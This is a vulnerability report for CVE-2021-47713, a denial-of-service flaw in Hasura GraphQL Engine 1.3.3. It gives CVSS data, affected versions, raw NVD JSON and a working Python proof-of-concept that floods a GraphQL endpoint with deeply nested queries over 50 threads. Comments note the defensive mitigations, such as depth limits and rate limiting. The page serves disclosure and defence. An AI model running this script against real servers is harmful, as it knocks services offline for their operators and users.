Security Vulnerability Report
CVE-2021-47713 CVSS 7.5 HIGH

CVE-2021-47713

Published: 2025-12-22 22:15:59
Last Modified: 2025-12-26 16:56:28

Description

Hasura GraphQL 1.3.3 contains a denial of service vulnerability that allows attackers to overwhelm the service by crafting malicious GraphQL queries with excessive nested fields. Attackers can send repeated requests with extremely long query strings and multiple threads to consume server resources and potentially crash the GraphQL endpoint.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:hasura:graphql_engine:1.3.3:*:*:*:*:*:*:* - VULNERABLE
Hasura GraphQL Engine < 1.3.4
Hasura GraphQL Engine 1.3.3
Hasura GraphQL Engine 1.3.2
Hasura GraphQL Engine 1.3.1
Hasura GraphQL Engine 1.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import concurrent.futures
import time  # imported but never used in this script

# CVE-2021-47713 PoC - Hasura GraphQL DoS via nested queries
# Target: Hasura GraphQL Engine <= 1.3.3
#
# Reviewer notes (defensive reading of this PoC):
#   * The weakness class is CWE-770 (resource allocation without limits):
#     the server parses and resolves arbitrarily deep selection sets. The
#     standard mitigation is a server-side maximum query depth / query
#     complexity limit, plus per-client rate limiting on the GraphQL endpoint.
#   * Detection signals visible in this script: a burst of POSTs to
#     /v1/graphql from one source, each carrying a query whose selection set
#     repeats the same field name many levels deep.
#   * `requests` is a third-party dependency; the PoC is not stdlib-only.

# Placeholder endpoint; the script has no argument parsing and reads this constant only.
TARGET_URL = "http://target-graphql-server/v1/graphql"

def create_malicious_query(depth: int = 10) -> dict[str, str]:
    """
    Generate a deeply nested GraphQL query to trigger DoS

    Builds a selection set in which the field ``users`` is nested inside
    itself ``depth + 1`` times (the recursion emits one level for each
    value of ``depth`` down to 0, inclusive). Returns the JSON body shape
    Hasura expects for a POST, ``{"query": "..."}``; no variables or
    operation name are included.

    From a defender's point of view, the nesting level is exactly what a
    query-depth limit rejects at parse time, before any resolvers run.
    """
    def build_nested(depth: int, field_name: str) -> str:
        # Base case: innermost selection is just the `id` leaf.
        if depth <= 0:
            return f"{field_name} {{ id }}"
        # Recursive case: wrap one more `field_name { id ... }` layer.
        # Doubled braces are f-string escapes for literal `{` and `}`.
        return f"{field_name} {{ id {build_nested(depth-1, field_name)} }}"
    # The outer `query { ... }` wrapper makes it an anonymous operation.
    query = f"query {{ {build_nested(depth, 'users')} }}"
    return {"query": query}

def send_request(session: requests.Session, payload: dict[str, str]) -> int | None:
    """
    Send malicious GraphQL request

    Posts ``payload`` as JSON to the module-level TARGET_URL with a 30 s
    timeout and returns the HTTP status code. Any exception (connection
    error, timeout, ...) is printed and mapped to ``None``; the caller
    never distinguishes failure kinds. The explicit Content-Type header is
    redundant with ``json=``, which already sets it.
    """
    try:
        headers = {"Content-Type": "application/json"}
        response = session.post(TARGET_URL, json=payload, headers=headers, timeout=30)
        return response.status_code
    except Exception as e:
        # Broad catch is deliberate here: the script only counts on
        # best-effort delivery and does not inspect responses.
        print(f"Request failed: {e}")
        return None

def exploit() -> None:
    """
    Main exploit function - send multiple nested queries

    Uses a single shared ``requests.Session`` (connection pooling) and a
    50-thread pool to submit 100 identical requests built with
    ``depth=15``. Results are drained with ``as_completed`` but the status
    codes are discarded, so the script reports no success/failure
    statistics. Note that ``len(str(payload))`` measures the ``repr`` of
    the dict, not the serialized JSON body actually sent.
    """
    session = requests.Session()
    payload = create_malicious_query(depth=15)
    print(f"[*] Starting DoS attack on {TARGET_URL}")
    print(f"[*] Payload size: {len(str(payload))} bytes")
    with concurrent.futures.ThreadPoolExecutor(max_workers=50) as executor:
        # 100 submissions over 50 workers: at most 50 requests in flight.
        futures = [executor.submit(send_request, session, payload) for _ in range(100)]
        for future in concurrent.futures.as_completed(futures):
            # send_request never raises (it swallows exceptions), so
            # .result() only serves to wait for completion.
            future.result()
    print("[*] Attack completed")

if __name__ == "__main__":
    exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47713", "sourceIdentifier": "[email protected]", "published": "2025-12-22T22:15:58.720", "lastModified": "2025-12-26T16:56:27.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hasura GraphQL 1.3.3 contains a denial of service vulnerability that allows attackers to overwhelm the service by crafting malicious GraphQL queries with excessive nested fields. Attackers can send repeated requests with extremely long query strings and multiple threads to consume server resources and potentially crash the GraphQL endpoint."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", 
"Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hasura:graphql_engine:1.3.3:*:*:*:*:*:*:*", "matchCriteriaId": "8E8F422D-10A0-469B-864D-D91498386D84"}]}]}], "references": [{"url": "https://github.com/hasura/graphql-engine", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/49789", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/hasura-graphql-denial-of-service-via-malicious-graphql-query", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}]}}